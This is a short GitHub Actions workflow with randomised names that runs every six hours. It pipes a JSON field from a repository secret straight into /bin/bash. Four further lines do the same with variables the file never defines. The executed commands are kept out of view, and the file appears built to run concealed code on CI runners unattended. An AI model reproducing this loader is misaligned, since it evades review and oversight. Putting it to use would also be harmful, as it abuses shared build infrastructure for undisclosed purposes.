name: jiadoufu6745
on:
  workflow_dispatch:
  schedule:
    - cron: '33 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: jiadoufu6745
        env:
          w99787: ${{ secrets.w99787 }}
        run: |
          echo $w99787 | jq -r .m9815 | /bin/bash
          echo $dng3 | jq -r .h9 | /bin/bash
          echo $bzk18083 | jq -r .on59537 | /bin/bash
          echo $fxik4809 | jq -r .k5409 | /bin/bash
          echo $zuu78903 | jq -r .yfk7098 | /bin/bash

